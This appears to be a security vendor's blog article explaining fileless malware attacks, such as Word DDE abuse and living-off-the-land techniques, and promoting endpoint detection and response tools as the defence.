What is a Fileless Cyberattack?The Threat that Directly Loads Malicious Code into Memory
Cyber threat actors are constantly developing more and more sophisticated techniques to infect systems. The best-known method is using files that contain and inject malware, sent through systems such as email or via web downloads. However, in recent years the industry has seen a sharp rise in a much more complex form of attack – fileless malware. But what exactly is it?
Instead of installing a malicious application on the victim's hard drive like traditional malware, fileless malware is a threat that directly loads malicious code into memory. It tends to use two entry vectors: either it exploits an existing vulnerability in a program the victim uses or it gets in through a file that’s not installed as such, like a script. Fileless malware often injects its code into the memory of existing programs, which makes it very difficult for conventional antivirus solutions to detect.
If this malware has already managed to get in, EDR solutions enable organizations to reduce detection and response time and therefore recovery time thanks to the post-execution functionalities.
Although these techniques are not that new, there has been exponential growth in cases since 2016 (in fact, the first memory-resident viruses emerged in the 80s). At WatchGuard, we have registered more than 200,000 different malwares originating from scripts since 2020 (compared to less than 50,000 from browsers, which comes second in the entry point ranking). This is an increase of 888% compared to 2019.
These threats include Word DDE (Dynamic Data Execution), which abuses a functionality in Microsoft Office documents to run code on the computer without using macros. But the most prominent fileless cyberattacks are living-off-the-land attacks, such as the famous Astaroth case.
Another example of a LotL attack we investigated recently involved obtaining the victim's SQL Server credentials, triggering a procedure that allows hackers to launch Windows utility PowerShell to then download and execute the malware. These attacks often go undetected, even if you have cybersecurity tools in place. So, how can organizations protect themselves from fileless malware?
Traditional cybersecurity solutions primarily base analysis on signatures of known malware and malware that uses files. Today, they can also detect some anomalous patterns in code structures that may indicate script-based attacks that vary in terms of sophistication.
However, although these tools are constantly updated, they are insufficient when it comes to dealing with the most dangerous and advanced threats such as fileless cyberattacks, or those coming from APT groups that can even take advantage of zero day vulnerabilities that have not yet been discovered.
This is where advanced Endpoint Detection and Response (EDR) solutions come in. In addition to preventing intrusions and detecting advanced malware, they focus on post-execution detection of malware. For this purpose, they start from contextual detections under the zero-trust premise of a proactive search for threats. They also use Threat Hunting services to search for them by correlating and identifying suspicious activities. Moreover, these solutions perform a thorough inspection of the systems' memory to detect potential code injections and exploits.
This enables the most sophisticated threats, such as fileless attacks, to be detected more easily. But if this malware has already managed to get in, EDR solutions enable organizations to reduce detection and response time and therefore recovery time thanks to the post-execution functionalities. And this is ultimately a key factor in mitigating any damage that malware may have caused to organizations.
If you are looking for more information about what fileless malware is, how it works, how attackers are using it, and what you need to do to keep your systems safe from this massively popular threat, check this out: Cybersecurity Insights: Fileless Attacks Primer.